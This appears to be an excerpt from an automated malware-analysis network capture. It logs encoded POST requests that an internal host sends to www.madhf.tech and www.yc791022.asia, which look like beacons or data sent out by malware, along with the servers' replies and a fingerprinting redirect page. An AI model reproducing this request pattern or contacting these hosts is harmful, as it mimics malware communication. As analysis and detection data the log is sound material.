                                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                                                                                              Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              71192.168.11.2049838103.224.182.24280
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:00:11.868295908 CET769OUTPOST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 77 77 4d 44 57 31 6e 2b 71 2f 55 49 79 63 73 42 6a 44 62 31 65 64 34 63 54 63 64 41 39 68 79 71 2b 7a 70 39 4a 6c 34 31 79 35 6b 72 33 6b 32 35 74 6c 4c 79 61 66 51 7a 59 6d 67 6d 66 53 47 4e 30 2f 63 38 4a 7a 65 4b 4e 59 4a 53 75 32 64 6a 6b 69 6e 34 6a 42 33 64 52 63 79 46 70 36 6a 7a 32 51 53 53 70 41 43 2f 4f 59 32 6b 47 6f 77 44 59 4c 51 34 65 4e 68 48 77 6b 38 74 77 51 56 56 36 6e 67 36 6b 70 6d 4a 55 56 74 46 74 4f 62 31 72 4f 64 35 77 4d 76 68 6d 61 2f 34 4d 4b 76 45 37 4f 39 30 36 42 74 71 55 31 49 2f 67 3d
                                                                                                                                                                              Data Ascii: iS=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFtOb1rOd5wMvhma/4MKvE7O906BtqU1I/g=
                                                                                                                                                                              Jan 11, 2025 04:00:12.052470922 CET871INHTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 03:00:11 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564411.5059612; expires=Tue, 09-Jan-2035 03:00:11 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                                                                                              Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              72192.168.11.2049839103.224.182.24280
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:00:14.553235054 CET2578OUTPOST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 34 77 50 77 65 31 6e 5a 47 2f 53 34 79 63 76 42 6a 41 62 31 66 48 34 63 37 59 64 48 31 78 79 6f 32 7a 6d 2b 78 6c 70 30 79 35 71 62 33 6b 30 35 74 6d 47 53 61 77 51 7a 4a 68 67 69 7a 53 47 4e 30 2f 63 2b 42 7a 4f 72 4e 59 45 79 75 31 65 6a 6b 6d 78 34 6a 70 33 64 59 6e 79 46 73 50 6a 41 4f 51 52 79 5a 41 42 4c 75 59 30 45 47 71 78 44 59 54 51 34 43 6b 68 48 39 62 38 74 55 36 56 58 61 6e 6c 37 45 7a 31 4b 78 4c 34 44 56 33 62 78 53 74 57 70 59 50 76 68 76 6a 37 62 51 49 6c 43 72 62 2b 30 43 57 36 4a 38 4e 64 49 76 2f 65 70 48 5a 5a 41 44 71 46 56 4b 51 49 36 56 36 42 52 67 6e 54 75 39 56 53 51 46 5a 4d 53 67 54 4f 79 46 32 44 4e 67 53 33 50 30 79 4b 68 56 35 42 6e 35 5a 61 49 71 4d 63 33 44 30 30 48 66 32 75 39 76 2b 36 7a 53 67 49 35 2b 71 6d 76 56 44 55 6c 4c 67 58 34 6a 57 4b 62 78 48 44 69 46 73 4d 30 51 77 6e 48 7a 59 62 61 37 58 44 75 78 4f 6a 36 79 72 38 35 34 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2Hit4wPwe1nZG/S4ycvBjAb1fH4c7YdH1xyo2zm+xlp0y5qb3k05tmGSawQzJhgizSGN0/c+BzOrNYEyu1ejkmx4jp3dYnyFsPjAOQRyZABLuY0EGqxDYTQ4CkhH9b8tU6VXanl7Ez1KxL4DV3bxStWpYPvhvj7bQIlCrb+0CW6J8NdIv/epHZZADqFVKQI6V6BRgnTu9VSQFZMSgTOyF2DNgS3P0yKhV5Bn5ZaIqMc3D00Hf2u9v+6zSgI5+qmvVDUlLgX4jWKbxHDiFsM0QwnHzYba7XDuxOj6yr8547dMbm3Sd7TlcmZhywWzB+PNKHa3bbf8JKCuShGJWHD5gnNRYm9cq8DVM3cDIVTULY/yjaVzfE9AjS8RJx0zzMQry8A127DMgjvBH16yYV4rLK9EI1xHOJDUJ9USpsY4Dc/v6bfi96o2tNX94On+X7q0gDi3suIC7XM4Dj4Urdx3PiVyi1Wl7rqJzlGuEsjocWMfuperkBu0LcD3kJBB7LqZE6nqxaEHqbzVy3Eq7z/YDdF1c0M/sE5LoBfJgV5QSYSuCzFZWcw4PSXIRsMX89trNMlK0y4/GgXl+JHCVtUNq4nSR5azjl6Cwa4i8Ssu7iinPaFaoBbJ2iiRDn53NVNXdL5ZTGNYKlcTdOn5bE0+NRk65qKvXf50dNqgrEnCZ8CCHxJkO9FcVoAIiuWgvxVD08XZPQoMzK0Foe6e4ncSQtejuK6/l6GW6yBj70o4EWl+9da3Pn0Sph+20/nb988lhtilYdvuaXQqQd4QFoQB+iiVVhx/ujNjPtxbftgALAuc888ISkw9RjrbQsGqy7oGNA0KEi90MwmgNxCcyG2yzUS9W/Prd+5OjWN0ZS3QbLugiRpPNyVsRhwPOxFQJVqc70tWWvTZmF+ecOBy0hgOFAQCUzpKg+8Ll2GaOkjLtakVhAqqHFwPEEsu4GkDUvWmOfTTQ4Fhxtl [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 04:00:14.553253889 CET2578OUTData Raw: 75 74 59 43 69 4c 50 36 7a 72 63 62 53 79 52 31 45 73 4e 73 49 41 6e 45 52 47 41 70 62 70 63 70 30 4e 6d 70 31 55 36 57 32 4a 79 61 42 63 54 64 79 48 56 38 66 73 48 58 31 4c 61 73 42 49 2b 37 30 36 78 49 34 37 64 55 76 37 79 51 6f 34 30 73 69 52
                                                                                                                                                                              Data Ascii: utYCiLP6zrcbSyR1EsNsIAnERGApbpcp0Nmp1U6W2JyaBcTdyHV8fsHX1LasBI+706xI47dUv7yQo40siRgOxhhjDLgD2vwfAYQoE4ETicVsBQrIo5A7+En3hwUxRQK4CQITgWxEIivul6yeLRZXovDfGn+DX+9xuSk0i+1mjXzvl3ejHisLavFndgfN911DLJhZz4e26IIoq3sKLO4qByKn6JXTSZ1Hi1DKrkIZAUIzNVucHXv
                                                                                                                                                                              Jan 11, 2025 04:00:14.553335905 CET2762OUTData Raw: 77 5a 53 6e 45 70 36 65 50 39 5a 63 6e 66 49 52 48 70 64 46 49 37 4d 30 45 70 45 44 78 64 6d 77 79 72 73 67 30 49 4b 32 4b 59 34 30 51 34 2f 55 48 30 2b 38 39 49 6e 57 38 52 58 65 49 63 57 70 2b 31 52 58 35 58 30 6d 57 57 69 7a 34 66 57 38 39 45
                                                                                                                                                                              Data Ascii: wZSnEp6eP9ZcnfIRHpdFI7M0EpEDxdmwyrsg0IK2KY40Q4/UH0+89InW8RXeIcWp+1RX5X0mWWiz4fW89E3UOotVm5z/EJnimqGxmtYXOYFYNBMft33dfT7aN+x8sjLtRNojatLaJKnSQXINKsfH1BSwfyDnp4+Dbbt16ewerqWoE19XMclOQJmEPsM6w7tk4gfR4uA6vgXGEjClMVRF97Utd/mwzr+a45TzABZ6ofU+BqGdmgB
                                                                                                                                                                              Jan 11, 2025 04:00:14.729598045 CET871INHTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 03:00:14 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564414.1745252; expires=Tue, 09-Jan-2035 03:00:14 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                                                                                              Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              73192.168.11.2049840103.224.182.24280
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:00:17.247589111 CET485OUTGET /3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 04:00:17.433700085 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 03:00:17 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564417.8161415; expires=Tue, 09-Jan-2035 03:00:17 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-length: 1460
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 69 53 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 59 71 66 6a 42 5a 72 61 37 58 79 61 42 4f 53 6d 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 4f 42 71 53 4b 65 54 52 4c 6b 2f 66 61 42 59 55 52 57 38 5a 65 46 74 2f 4a 6e 6e 58 4c 75 67 59 61 2f 38 4c 6f 33 51 69 4f 33 59 53 68 48 70 6d 33 4b 4a 4c 4d 68 57 64 74 69 61 6f 39 66 46 47 67 3d 26 42 69 3d 7a 4a 5f 77 36 79 50 47 26 27 3b 0a 0a 2f 2f [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 04:00:17.433710098 CET443INData Raw: 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 69 53 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 59 71 66 6a 42 5a 72 61 37 58 79 61 42 4f 53 6d 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 4f 42 71 53 4b 65
                                                                                                                                                                              Data Ascii: w.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG&fp=-3'>Click here to enter</a></div><noscript><meta http-equiv="refresh" content="0; UR


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              74192.168.11.2049848101.35.209.18380
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:01:55.462804079 CET758OUTPOST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 32 43 35 5a 6e 4f 54 59 6b 2b 39 77 64 42 59 48 57 50 6c 51 6d 4c 37 38 37 4e 55 30 61 74 6f 31 37 62 63 38 79 50 4e 43 74 65 54 70 4c 7a 52 49 42 56 36 41 37 72 76 78 41 51 59 37 72 58 61 55 47 4d 79 53 55 39 36 39 55 6b 38 36 6b 68 59 78 55 76 63 63 6c 64 36 73 44 45 4c 4e 37 31 69 50 64 36 76 49 39 48 6f 2b 75 6e 4c 77 58 74 66 4f 4a 36 33 4e 67 58 36 34 66 47 42 75 58 6e 6a 54 75 6e 38 50 72 66 66 35 37 33 78 5a 48 42 59 53 48 73 65 66 71 35 69 35 42 52 6a 5a 53 67 4f 54 75 6b 35 78 35 33 30 6d 63 38 2f 37 6e 51 6a 4a 6b 4e 4f 66 62 77 3d 3d
                                                                                                                                                                              Data Ascii: iS=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefq5i5BRjZSgOTuk5x530mc8/7nQjJkNOfbw==
                                                                                                                                                                              Jan 11, 2025 04:01:55.768549919 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:01:55 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              75192.168.11.2049849101.35.209.18380
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:01:58.284071922 CET778OUTPOST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 63 31 2b 4f 67 38 7a 4e 6c 43 67 2b 54 70 54 44 52 4e 4d 31 36 39 37 72 7a 44 41 55 59 37 72 58 4f 55 47 4a 65 53 55 4b 75 36 55 30 38 30 72 42 59 6b 51 76 63 63 6c 64 36 73 44 46 76 6e 37 30 4b 50 64 49 37 49 38 6a 38 39 31 48 4c 78 55 74 66 4f 4e 36 33 4a 67 58 36 61 66 44 5a 49 58 69 76 54 75 6a 73 50 72 75 66 2b 78 33 78 66 59 52 5a 4e 41 4a 48 4a 6b 64 4f 47 4e 68 32 48 56 78 57 34 69 53 30 72 6b 46 41 43 66 76 6a 4a 6a 67 61 68 6d 50 50 45 47 34 61 75 45 72 6f 43 79 2f 35 2f 33 4d 6a 71 61 41 4b 74 53 4b 63 3d
                                                                                                                                                                              Data Ascii: iS=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfvjJjgahmPPEG4auEroCy/5/3MjqaAKtSKc=
                                                                                                                                                                              Jan 11, 2025 04:01:58.586853027 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:01:58 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
